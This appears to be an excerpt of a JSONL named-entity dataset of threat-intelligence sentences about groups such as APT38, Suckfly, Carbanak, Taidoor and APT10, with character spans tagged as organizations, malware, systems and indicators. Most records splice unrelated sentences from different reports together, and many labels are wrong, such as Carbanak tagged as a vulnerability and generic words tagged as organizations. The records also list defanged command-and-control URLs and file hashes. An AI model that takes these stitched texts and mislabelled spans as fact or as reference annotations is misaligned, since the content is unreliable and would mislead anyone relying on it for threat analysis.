APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world . Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 74, "end": 93, "label": "Organization"}, {"start": 149, "end": 171, "label": "Organization"}, {"start": 210, "end": 217, "label": "Vulnerability"}, {"start": 238, "end": 245, "label": "Malware"}, {"start": 269, "end": 295, "label": "Malware"}, {"start": 330, "end": 334, "label": "Indicator"}]} {"text": "The following SMS message can be used to kill the sample analyzed in this research and all other variants that use the same private key : HrLbpr3x/htAVnAgYepBuH2xmFDb68TYTt7FwGn0ddGlQJv/hqsctL57ocFU0Oz3L+uhLcOGG7GVBAfHKL1TBQ== Sending this SMS will trigger TrickMo \u2019 s kill switch by sending the string \u201c 4 \u201d encrypted with the generated RSA public key and base64 APT38 is believed to operate more similarly to an espionage operation , carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems . The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry .", "spans": [{"start": 257, "end": 264, "label": "Malware"}, {"start": 364, "end": 369, "label": "Organization"}, {"start": 491, "end": 513, "label": "Organization"}, {"start": 660, "end": 669, "label": "Organization"}, {"start": 689, "end": 733, "label": "Organization"}]} {"text": "encoded . APT38 is a financially motivated group linked to North Korean cyber espionage operators , renown for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware . 
Blackfly began with a campaign to steal certificates , which were later used to sign malware used in targeted attacks .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 43, "end": 48, "label": "Organization"}, {"start": 72, "end": 97, "label": "Organization"}, {"start": 168, "end": 190, "label": "Organization"}, {"start": 237, "end": 245, "label": "Organization"}]} {"text": "Indicators of Compromise ( IoCs ) hxxp : //mcsoft365.com/c hxxp : //pingconnect.net/c Hashes MD5 : 5c749c9fce8c41bf6bcc9bd8a691621b SHA256 : 284bd2d16092b4d13b6bc85d87950eb4c5e8cbba9af2a04d76d88da2f26c485c MD5 : b264af5d2f3390e465052ab502b0726d Based on observed activity , we judge that APT38 's primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime . In March 2016 , Symantec published a blog on Suckfly , an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates .", "spans": [{"start": 34, "end": 85, "label": "Indicator"}, {"start": 99, "end": 131, "label": "Indicator"}, {"start": 141, "end": 205, "label": "Indicator"}, {"start": 212, "end": 244, "label": "Indicator"}, {"start": 288, "end": 293, "label": "Organization"}, {"start": 326, "end": 348, "label": "Organization"}, {"start": 470, "end": 478, "label": "Organization"}]} {"text": "SHA256 : 8ab1712ce9ca2d7952ab763d8a4872aa6a278c3f60dc13e0aebe59f50e6e30f6 The TrickMo Factor The TrickBot Trojan was one of the most active banking malware strains in the cybercrime arena in 2019 . Since 2015 , APT38 has attempted to steal hundreds of millions of dollars from financial institutions . 
Since then we have identified a number of attacks over a two-year period , beginning in April 2014 , which we attribute to Suckfly .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}, {"start": 78, "end": 85, "label": "Malware"}, {"start": 97, "end": 112, "label": "Malware"}, {"start": 211, "end": 216, "label": "Organization"}, {"start": 277, "end": 299, "label": "Organization"}]} {"text": "From our analysis , it is apparent that TrickMo is designed to help TrickBot break the most recent methods of TAN-based authentication . APT38 , in particular , is strongly distinguishable because of its specific focus on financial institutions and operations that attempt to use SWIFT fraud to steal millions of dollars at a time . The attacks targeted high-profile targets , including government and commercial organizations .", "spans": [{"start": 40, "end": 47, "label": "Malware"}, {"start": 68, "end": 76, "label": "Malware"}, {"start": 137, "end": 142, "label": "Organization"}, {"start": 222, "end": 244, "label": "Organization"}, {"start": 280, "end": 285, "label": "System"}, {"start": 387, "end": 397, "label": "Organization"}, {"start": 402, "end": 426, "label": "Organization"}]} {"text": "One of the most significant features TrickMo possesses is the app recording feature , which is what gives TrickBot the ability to overcome the newer pushTAN app validations deployed by banks . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions to raise money for the North Korean regime . 
these attacks were part of a planned operation against specific targets in India .", "spans": [{"start": 37, "end": 44, "label": "Malware"}, {"start": 106, "end": 114, "label": "Malware"}, {"start": 255, "end": 260, "label": "Organization"}, {"start": 296, "end": 318, "label": "Organization"}]} {"text": "SimBad : A Rogue Adware Campaign On Google Play March 13 , 2019 Check Point researchers from the Mobile Threat Team have discovered a new adware campaign on the Google Play Store . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions and financial systems to raise money for the North Korean regime . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 36, "end": 47, "label": "System"}, {"start": 64, "end": 75, "label": "Organization"}, {"start": 161, "end": 178, "label": "System"}, {"start": 243, "end": 248, "label": "Organization"}, {"start": 284, "end": 306, "label": "Organization"}, {"start": 483, "end": 499, "label": "Indicator"}]} {"text": "This particular strain of Adware was found in 206 applications , and the combined download count has reached almost 150 million . Since at least the beginning of 2014 , APT38 operations have focused almost exclusively on developing and conducting financially motivated campaigns targeting international entities , whereas TEMP.Hermit is generally linked to operations focused on South Korea and the United States . 
While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": [{"start": 169, "end": 174, "label": "Organization"}, {"start": 289, "end": 311, "label": "Organization"}, {"start": 322, "end": 333, "label": "Organization"}, {"start": 524, "end": 540, "label": "Indicator"}]} {"text": "Google was swiftly notified and removed the infected applications from the Google Play Store . APT38 relies on DYEPACK , a SWIFT transaction-hijacking framework , to initiate transactions , steal money , and hide any evidence of the fraudulent transactions from the victimized bank . The first known Suckfly campaign began in April of 2014 .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 75, "end": 86, "label": "System"}, {"start": 95, "end": 100, "label": "Organization"}, {"start": 111, "end": 118, "label": "System"}, {"start": 277, "end": 281, "label": "Organization"}]} {"text": "Inside the SDK The malware resides within the \u2018 RXDrioder \u2019 Software Development Kit ( SDK ) , which is provided by \u2018 addroider [ . During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities . Suckfly 's attacks on government organizations that provide information technology services to other government branches is not limited to India .", "spans": [{"start": 118, "end": 131, "label": "Indicator"}, {"start": 152, "end": 157, "label": "Organization"}, {"start": 274, "end": 281, "label": "Organization"}, {"start": 318, "end": 342, "label": "Organization"}, {"start": 356, "end": 387, "label": "Organization"}, {"start": 397, "end": 407, "label": "Organization"}]} {"text": "] com \u2019 as an ad-related SDK . 
APT39 's focus on the widespread theft of personal information sets it apart from other Iranian groups FireEye tracks , which have been linked to influence operations , disruptive attacks , and other threats . It has conducted attacks on similar organizations in Saudi Arabia , likely because of the access that those organizations have .", "spans": [{"start": 31, "end": 36, "label": "Organization"}, {"start": 127, "end": 133, "label": "Organization"}, {"start": 134, "end": 141, "label": "Organization"}]} {"text": "We believe the developers were scammed to use this malicious SDK , unaware of its content , leading to the fact that this campaign was not targeting a specific county or developed by the same developer . APT39 's focus on the telecommunications and travel industries suggests intent to perform monitoring , tracking , or surveillance operations against specific individuals , collect proprietary or customer data for commercial or operational purposes that serve strategic requirements related to national priorities , or create additional accesses and vectors to facilitate future campaigns . Similar to its other attacks , Suckfly used the Nidiran back door along with a number of hacktools to infect the victim 's internal hosts .", "spans": [{"start": 204, "end": 209, "label": "Organization"}, {"start": 226, "end": 266, "label": "Organization"}, {"start": 353, "end": 373, "label": "Organization"}, {"start": 642, "end": 659, "label": "Malware"}, {"start": 683, "end": 692, "label": "Malware"}]} {"text": "The malware has been dubbed \u2018 SimBad \u2019 due to the fact that a large portion of the infected applications are simulator games . Targeting data supports the belief that APT39 's key mission is to track or monitor targets of interest , collect personal information , including travel itineraries , and gather customer data from telecommunications firms . 
In 2015 , Suckfly conducted a multistage attack .", "spans": [{"start": 30, "end": 36, "label": "Malware"}, {"start": 167, "end": 172, "label": "Organization"}, {"start": 325, "end": 349, "label": "Organization"}]} {"text": "The Infection Chain Once the user downloads and installs one of the infected applications , \u2018 SimBad \u2019 registers itself to the \u2018 BOOT_COMPLETE \u2019 and \u2018 USER_PRESENT \u2019 intents , which lets \u2018 SimBad \u2019 to perform actions after the device has finished booting and while the user is using his device respectively . BRONZE BUTLER uses credential theft tools such as Mimikatz and WCE to steal authentication information from the memory of compromised hosts . Suckfly conducted a multistage attack between April 22 and May 4 .", "spans": [{"start": 94, "end": 100, "label": "Malware"}, {"start": 189, "end": 195, "label": "Malware"}, {"start": 309, "end": 322, "label": "Organization"}, {"start": 359, "end": 367, "label": "System"}, {"start": 372, "end": 375, "label": "System"}]} {"text": "After installation , the malware connects to the designated Command and Control ( C & C ) server , and receives a command to perform . Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data exfiltration and to provide remote access to infected machines . 
On April 22 , 2015 , Suckfly exploited a vulnerability on the targeted employee 's operating system ( Windows ) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack .", "spans": [{"start": 135, "end": 143, "label": "Vulnerability"}, {"start": 186, "end": 193, "label": "System"}, {"start": 211, "end": 220, "label": "Organization"}, {"start": 314, "end": 321, "label": "Organization"}, {"start": 395, "end": 402, "label": "System"}, {"start": 483, "end": 500, "label": "Malware"}]} {"text": "\u2018 SimBad \u2019 comes with a respected list of capabilities on the user \u2019 s device , such as removing the icon from the launcher , thus making it harder for the user to uninstall , start to display background ads and open a browser with a given URL . In some cases , the attackers used the Society for Worldwide Interbank Financial Telecommunication ( SWIFT ) network to transfer money to their accounts . Suckfly conducted a multistage attack against an e-commerce organization .", "spans": [{"start": 2, "end": 8, "label": "Malware"}, {"start": 266, "end": 275, "label": "Organization"}, {"start": 297, "end": 344, "label": "System"}, {"start": 347, "end": 352, "label": "System"}, {"start": 450, "end": 473, "label": "Organization"}]} {"text": "What Does SimBad Do ? If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . 
Suckfly conducted a multistage attack against an e-commerce organization based in India .", "spans": [{"start": 10, "end": 16, "label": "Malware"}, {"start": 54, "end": 62, "label": "Vulnerability"}, {"start": 231, "end": 244, "label": "Vulnerability"}, {"start": 329, "end": 352, "label": "Organization"}]} {"text": "\u2018 SimBad \u2019 has capabilities that can be divided into three groups \u2013 Show Ads , Phishing , and Exposure to other applications . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . Most of the group 's attacks are focused on government or technology related companies and organizations .", "spans": [{"start": 2, "end": 8, "label": "Malware"}, {"start": 184, "end": 207, "label": "System"}, {"start": 210, "end": 213, "label": "System"}, {"start": 218, "end": 226, "label": "Vulnerability"}, {"start": 321, "end": 331, "label": "Organization"}, {"start": 335, "end": 363, "label": "Organization"}]} {"text": "With the capability to open a given URL in a browser , the actor behind \u2018 SimBad \u2019 can generate phishing pages for multiple platforms and open them in a browser , thus performing spear-phishing attacks on the user . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as OilRig and CopyKittens . 
While we know the attackers used a custom dropper to install the back door , we do not know the delivery vector .", "spans": [{"start": 74, "end": 80, "label": "Malware"}, {"start": 428, "end": 441, "label": "Organization"}, {"start": 452, "end": 458, "label": "Organization"}, {"start": 463, "end": 474, "label": "Organization"}, {"start": 512, "end": 526, "label": "Malware"}]} {"text": "With the capability to open market applications , such as Google Play and 9Apps , with a specific keyword search or even a single application \u2019 s page , the actor can gain exposure for other threat actors and increase his profits . During intense intelligence gathering over the last 24 months , we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort . While tracking what days of the week Suckfly used its hacktools , we discovered that the group was only active Monday through Friday .", "spans": [{"start": 58, "end": 69, "label": "System"}, {"start": 74, "end": 79, "label": "System"}, {"start": 342, "end": 359, "label": "Organization"}, {"start": 487, "end": 496, "label": "Malware"}]} {"text": "The actor can even take his malicious activities to the next level by installing a remote application from a designated server , thus allowing him to install new malware once it is required . Gallmaker used lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange ( DDE ) protocol in order to gain access to victim machines . By targeting all of these organizations together , Suckfly could have had a much larger impact on India and its economy .", "spans": [{"start": 192, "end": 201, "label": "Organization"}]} {"text": "The C & C server observed in this campaign is \u2018 www [ . 
Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries . While we don't know the motivations behind the attacks , the targeted commercial organizations , along with the targeted government organizations , may point in this direction .", "spans": [{"start": 48, "end": 55, "label": "Indicator"}, {"start": 131, "end": 139, "label": "Vulnerability"}, {"start": 144, "end": 163, "label": "Organization"}, {"start": 265, "end": 287, "label": "Organization"}, {"start": 385, "end": 409, "label": "Organization"}, {"start": 436, "end": 460, "label": "Organization"}]} {"text": "] addroider.com \u2019 . Our investigations revealed that the attackers drove around several cities in Russia , stealing money from ATMs belonging to different banks . There is no evidence that Suckfly gained any benefits from attacking the government organizations , but someone else may have benefited from these attacks .", "spans": [{"start": 57, "end": 66, "label": "Organization"}, {"start": 155, "end": 160, "label": "Organization"}, {"start": 236, "end": 260, "label": "Organization"}]} {"text": "This server runs an instance of \u2018 Parse Server \u2019 ( source on GitHub ) , an open source version of the Parse Backend infrastructure , which is a model for providing web app and mobile app developers with a way to link their applications to backend cloud storage and APIs exposed by back-end applications , while also providing features such as user management , push notifications and more . Utilizing KillDisk in the attack scenario most likely served one of two purposes : the attackers covering their tracks after an espionage operation , or it was used directly for extortion or cyber-sabotage . 
During this time they were able to steal digital certificates from South Korean companies and launch attacks against Indian and Saudi Arabian government organizations .", "spans": [{"start": 61, "end": 67, "label": "Organization"}, {"start": 401, "end": 409, "label": "System"}, {"start": 478, "end": 487, "label": "Organization"}, {"start": 582, "end": 596, "label": "Organization"}, {"start": 679, "end": 688, "label": "Organization"}, {"start": 741, "end": 765, "label": "Organization"}]} {"text": "The domain \u2018 addroider [ . The Lazarus Group 's objective was to gain access to the target 's environment and obtain key military program insight or steal money . We believe that Suckfly will continue to target organizations in India and similar organizations in other countries in order to provide economic insight to the organization behind Suckfly 's operations .", "spans": [{"start": 13, "end": 26, "label": "Indicator"}, {"start": 31, "end": 44, "label": "Organization"}, {"start": 299, "end": 307, "label": "Organization"}]} {"text": "] com \u2019 was registered via GoDaddy , and uses privacy protection service . Just last week Lazarus were found stealing millions from ATMs across Asia and Africa . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": [{"start": 27, "end": 34, "label": "Organization"}, {"start": 90, "end": 97, "label": "Organization"}, {"start": 228, "end": 234, "label": "System"}, {"start": 242, "end": 267, "label": "Indicator"}, {"start": 300, "end": 313, "label": "Vulnerability"}, {"start": 328, "end": 340, "label": "Malware"}, {"start": 372, "end": 398, "label": "Malware"}, {"start": 401, "end": 404, "label": "Malware"}]} {"text": "While accessing the domain from a browser you get a login page very similar to other malware panels . 
The backdoors Lazarus are deploying are difficult to detect and a significant threat to the privacy and security of enterprises , allowing attackers to steal information , delete files , install malware , and more . Proofpoint is tracking this attacker , believed to operate out of China , as TA459 .", "spans": [{"start": 116, "end": 123, "label": "Organization"}, {"start": 218, "end": 229, "label": "Organization"}, {"start": 241, "end": 250, "label": "Organization"}, {"start": 318, "end": 328, "label": "Organization"}, {"start": 395, "end": 400, "label": "Organization"}]} {"text": "The \u2018 Register \u2019 and \u2018 Sign Up \u2019 links are broken and \u2018 redirects \u2019 the user back to the login page . Bankshot is designed to persist on a victim 's network for further exploitation ; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": [{"start": 102, "end": 110, "label": "System"}, {"start": 193, "end": 217, "label": "Organization"}, {"start": 286, "end": 309, "label": "Organization"}, {"start": 382, "end": 388, "label": "System"}, {"start": 396, "end": 421, "label": "Indicator"}, {"start": 454, "end": 467, "label": "Vulnerability"}, {"start": 482, "end": 494, "label": "Malware"}, {"start": 526, "end": 552, "label": "Malware"}, {"start": 555, "end": 558, "label": "Malware"}]} {"text": "According to RiskIQ \u2019 s PassiveTotal , the domain expired 7 months ago . The Leafminer 's post-compromise toolkit suggests that Leafminer is looking for email data , files , and database servers on compromised target systems . 
TA549 possesses a diverse malware arsenal including PlugX , NetTraveler , and ZeroT .", "spans": [{"start": 13, "end": 19, "label": "System"}, {"start": 77, "end": 86, "label": "Organization"}, {"start": 128, "end": 137, "label": "Organization"}, {"start": 227, "end": 232, "label": "Organization"}, {"start": 279, "end": 284, "label": "Malware"}, {"start": 287, "end": 298, "label": "Malware"}, {"start": 305, "end": 310, "label": "Malware"}]} {"text": "As a result , it may be that are looking into a compromised , parked domain that was initially used legitimately , but is now participating in malicious activities . Another intrusion approach used by Leafminer seems a lot less sophisticated than the previously described methods but can be just as effective : using specific hacktools to guess the login passwords for services exposed by a targeted system . TA459 is well-known for targeting organizations in Russia and neighboring countries .", "spans": [{"start": 201, "end": 210, "label": "Organization"}, {"start": 326, "end": 335, "label": "System"}, {"start": 409, "end": 414, "label": "Organization"}]} {"text": "With the capabilities of showing out-of-scope ads , exposing the user to other applications , and opening a URL in a browser , \u2018 SimBad \u2019 acts now as an Adware , but already has the infrastructure to evolve into a much larger threat . While the group has not yet demonstrated an ICS capability , RASPITE 's recent targeting focus and methodology are clear indicators of necessary activity for initial intrusion operations into an IT network to prepare the way for later potential ICS events . 
Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular LOCs of research and expertise further complicate an already difficult security situation for organizations dealing with more traditional malware threats , phishing campaigns , and socially engineered threats every day .", "spans": [{"start": 129, "end": 135, "label": "Malware"}, {"start": 245, "end": 250, "label": "Organization"}, {"start": 279, "end": 282, "label": "System"}, {"start": 296, "end": 303, "label": "Organization"}, {"start": 430, "end": 432, "label": "Organization"}, {"start": 480, "end": 483, "label": "System"}, {"start": 534, "end": 539, "label": "Organization"}]} {"text": "FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40 . Using data collected from the Trend Micro\u2122 Smart Protection Network , we are able to identify victims whose networks communicated with Taidoor C&C servers .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 155, "end": 160, "label": "Organization"}, {"start": 169, "end": 174, "label": "Organization"}, {"start": 207, "end": 244, "label": "Organization"}, {"start": 312, "end": 331, "label": "Malware"}]} {"text": "APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia . The Taidoor attackers have been actively engaging in targeted attacks since at least March 4 , 2009 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]} {"text": "The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan . 
Taidoor spoofed Taiwanese government email addresses to send out socially engineered emails in the Chinese language that typically leveraged Taiwan-themed issues .", "spans": [{"start": 22, "end": 32, "label": "Organization"}, {"start": 46, "end": 52, "label": "Organization"}, {"start": 216, "end": 226, "label": "Organization"}, {"start": 227, "end": 232, "label": "System"}, {"start": 275, "end": 281, "label": "System"}]} {"text": "During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . Despite some exceptions , the Taidoor campaign often used Taiwanese IP addresses as C&C servers and email addresses to send out socially engineered emails with malware as attachments .", "spans": [{"start": 27, "end": 32, "label": "Organization"}, {"start": 74, "end": 99, "label": "Malware"}, {"start": 210, "end": 212, "label": "Malware"}, {"start": 226, "end": 229, "label": "System"}, {"start": 242, "end": 247, "label": "System"}, {"start": 290, "end": 296, "label": "System"}]} {"text": "APT35 also installed BROKEYOLK , a custom backdoor , to maintain persistence on the compromised host . One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 35, "end": 50, "label": "System"}, {"start": 183, "end": 193, "label": "Organization"}]} {"text": "They then proceeded to log directly into the VPN using the credentials of the compromised user . 
Suckfly targeted one of India 's largest e-commerce companies , a major Indian shipping company , one of India 's largest financial organizations , and an IT firm that provides support for India 's largest stock exchange .", "spans": [{"start": 59, "end": 94, "label": "System"}, {"start": 138, "end": 158, "label": "Organization"}, {"start": 176, "end": 192, "label": "Organization"}, {"start": 219, "end": 242, "label": "Organization"}, {"start": 252, "end": 259, "label": "Organization"}]} {"text": "Ultimately , APT35 had used access to hundreds of mailboxes to read email communications and steal data related to Middle East organizations , which later became victims of destructive attacks . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 .", "spans": [{"start": 13, "end": 18, "label": "Organization"}, {"start": 68, "end": 88, "label": "Organization"}, {"start": 281, "end": 294, "label": "Indicator"}, {"start": 304, "end": 311, "label": "Vulnerability"}, {"start": 314, "end": 323, "label": "Organization"}, {"start": 324, "end": 339, "label": "System"}, {"start": 340, "end": 353, "label": "Vulnerability"}, {"start": 356, "end": 369, "label": "Vulnerability"}]} {"text": "The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT . 
Taidoor actively sent out malicious documents and maintained several IP addresses for command and control .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 30, "end": 42, "label": "Organization"}, {"start": 189, "end": 193, "label": "System"}, {"start": 202, "end": 209, "label": "System"}]} {"text": "Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as Oilrig1 and CopyKittens2 . The attackers actively sent out malicious documents and maintained several IP addresses for command and control .", "spans": [{"start": 212, "end": 225, "label": "Organization"}, {"start": 236, "end": 243, "label": "Organization"}, {"start": 248, "end": 260, "label": "Organization"}]} {"text": "To sum up , the HBO hacker - Behzad Mesri is a member of Turk Black Hat along with ArYaIeIrAn , who provides infrastructure for Charming Kitten activity via PersianDNS / Mahanserver together with Mohammad Rasoul Akbari , who is a Facebook friend of Behzad Mesri 's . 
As part of their social engineering ploy , the Taidoor attackers attach a decoy document to their emails that , when opened , displays the contents of a legitimate document but executes a malicious payload in the background .", "spans": [{"start": 20, "end": 26, "label": "Organization"}, {"start": 29, "end": 41, "label": "Organization"}, {"start": 57, "end": 71, "label": "Organization"}, {"start": 83, "end": 93, "label": "Organization"}, {"start": 157, "end": 167, "label": "System"}, {"start": 170, "end": 181, "label": "System"}, {"start": 230, "end": 238, "label": "Organization"}, {"start": 249, "end": 261, "label": "Organization"}, {"start": 284, "end": 302, "label": "Organization"}, {"start": 365, "end": 371, "label": "System"}]} {"text": "They move laterally and escalate system privileges to extract sensitive information \u2014 whenever the attacker wants to do so.4 ,5 Because some RATs used in targeted attacks are widely available , determining whether an attack is part of a broader APT campaign can be difficult . Sometimes , however , certain samples made use of domain names for HTTP communication .", "spans": [{"start": 99, "end": 107, "label": "Organization"}, {"start": 141, "end": 145, "label": "System"}, {"start": 344, "end": 348, "label": "Indicator"}]} {"text": "In 2011 , three years after the most recent release of PIVY , attackers used the RAT to compromise security firm RSA and steal data about its SecureID authentication system . 
Based on the command capabilities of the Taidoor malware , we were able to determine that data theft and data destruction was possible .", "spans": [{"start": 55, "end": 59, "label": "System"}, {"start": 62, "end": 71, "label": "Organization"}, {"start": 81, "end": 84, "label": "System"}, {"start": 99, "end": 116, "label": "Organization"}, {"start": 216, "end": 223, "label": "Malware"}, {"start": 224, "end": 231, "label": "Malware"}]} {"text": "Attackers can point and click their way through a compromised network and exfiltrate data . The ultimate objective of targeted attacks is to acquire sensitive data .", "spans": [{"start": 0, "end": 9, "label": "Organization"}]} {"text": "The campaign , which we refer to as Operation Cloud Hopper , has targeted managed IT service providers ( MSPs ) , allowing APT10 unprecedented potential access to the intellectual property and sensitive data of those MSPs and their clients globally . In December 2017 , FireEye publicly released our first analysis on the TRITON attack where malicious actors used the TRITON custom attack framework to manipulate industrial safety systems at a critical infrastructure facility and inadvertently caused a process shutdown .", "spans": [{"start": 74, "end": 102, "label": "Organization"}, {"start": 105, "end": 109, "label": "Organization"}, {"start": 123, "end": 128, "label": "Organization"}, {"start": 217, "end": 221, "label": "Organization"}, {"start": 270, "end": 277, "label": "Organization"}, {"start": 368, "end": 374, "label": "Malware"}]} {"text": "PwC UK and BAE Systems assess it is highly likely that APT10 is a China-based threat actor with a focus on espionage and wide ranging information collection . 
In our most recent analysis , we attributed the intrusion activity that led to the deployment of TRITON to a Russian government-owned technical research institute in Moscow .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 11, "end": 22, "label": "Organization"}, {"start": 55, "end": 60, "label": "Organization"}, {"start": 78, "end": 90, "label": "Organization"}, {"start": 107, "end": 116, "label": "Organization"}, {"start": 256, "end": 262, "label": "Malware"}]} {"text": "APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world . For more in-depth analysis of TRITON and other cyber threats , consider subscribing to FireEye Cyber Threat Intelligence .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 104, "end": 116, "label": "System"}, {"start": 138, "end": 147, "label": "Organization"}, {"start": 228, "end": 234, "label": "Malware"}, {"start": 285, "end": 318, "label": "Organization"}]} {"text": "This , in turn , would provide access to a larger amount of intellectual property and sensitive data . During this time , the attacker must ensure continued access to the target environment or risk losing years of effort and potentially expensive custom ICS malware .", "spans": [{"start": 254, "end": 257, "label": "Malware"}, {"start": 258, "end": 265, "label": "Malware"}]} {"text": "APT10 has been observed to exfiltrate stolen intellectual property via the MSPs , hence evading local network defences . 
In this report we continue our research of the actor 's operations with a specific focus on a selection of custom information technology ( IT ) tools and tactics the threat actor leveraged during the early stages of the targeted attack lifecycle .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 75, "end": 79, "label": "Organization"}, {"start": 235, "end": 257, "label": "Organization"}, {"start": 260, "end": 262, "label": "Organization"}]} {"text": "In order to gain any further credentials , APT10 will usually deploy credential theft tools such as mimikatz or PwDump , sometimes using DLL load order hijacking , to use against a domain controller , explained further in Annex B . Additionally , the actor possibly gained a foothold on other target networks\u2014beyond the two intrusions discussed in this post \u2013 using similar strategies .", "spans": [{"start": 43, "end": 48, "label": "Organization"}, {"start": 100, "end": 108, "label": "System"}, {"start": 112, "end": 118, "label": "System"}, {"start": 137, "end": 161, "label": "System"}]} {"text": "For example , in addition to compromising high value domain controllers and security servers , the threat actor has also been observed identifying and subsequently installing malware on low profile systems that provide non-critical support functions to the business , and are thus less likely to draw the attention of system administrators . 
There is often a singular focus from the security community on ICS malware largely due to its novel nature and the fact that there are very few examples found in the wild .", "spans": [{"start": 99, "end": 111, "label": "Organization"}, {"start": 383, "end": 401, "label": "Organization"}, {"start": 405, "end": 408, "label": "Malware"}, {"start": 409, "end": 416, "label": "Malware"}]} {"text": "Primarily focused on governments and military operations of countries with interests in the South China Sea , Moafee likely chooses its targets based on region 's rich natural resources . In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute .", "spans": [{"start": 21, "end": 32, "label": "Organization"}, {"start": 110, "end": 116, "label": "Organization"}, {"start": 248, "end": 258, "label": "Organization"}, {"start": 294, "end": 300, "label": "Malware"}]} {"text": "By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage . Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates .", "spans": [{"start": 13, "end": 22, "label": "Organization"}, {"start": 27, "end": 40, "label": "Organization"}, {"start": 74, "end": 82, "label": "Organization"}, {"start": 132, "end": 140, "label": "Organization"}]} {"text": "It is in use by the Molerats ( aka Gaza cybergang ) , a politically motivated group whose main objective , we believe , is intelligence gathering . 
TEMP.Veles' lateral movement activities used a publicly-available PowerShell-based tool , WMImplant .", "spans": [{"start": 20, "end": 28, "label": "Organization"}, {"start": 35, "end": 49, "label": "Organization"}, {"start": 56, "end": 67, "label": "Organization"}, {"start": 78, "end": 83, "label": "Organization"}, {"start": 148, "end": 159, "label": "Organization"}, {"start": 214, "end": 235, "label": "Malware"}, {"start": 238, "end": 247, "label": "Malware"}]} {"text": "DustySky has been developed and used since May 2015 by Molerats ( aka \" Gaza cybergang \" ) , a terrorist group whose main objective in this campaign is intelligence gathering . On multiple dates in 2017 , TEMP.Veles struggled to execute this utility on multiple victim systems , potentially due to AV detection .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 55, "end": 63, "label": "Organization"}, {"start": 72, "end": 86, "label": "Organization"}, {"start": 95, "end": 110, "label": "Organization"}, {"start": 205, "end": 215, "label": "Organization"}]} {"text": "FIN7 is a threat actor group that is financially motivated with targets in the restaurant , services and financial sectors . Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software , retrofitted with code used for command and control .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 10, "end": 28, "label": "Organization"}, {"start": 79, "end": 89, "label": "Organization"}, {"start": 92, "end": 100, "label": "Organization"}, {"start": 105, "end": 122, "label": "Organization"}, {"start": 153, "end": 163, "label": "Organization"}, {"start": 195, 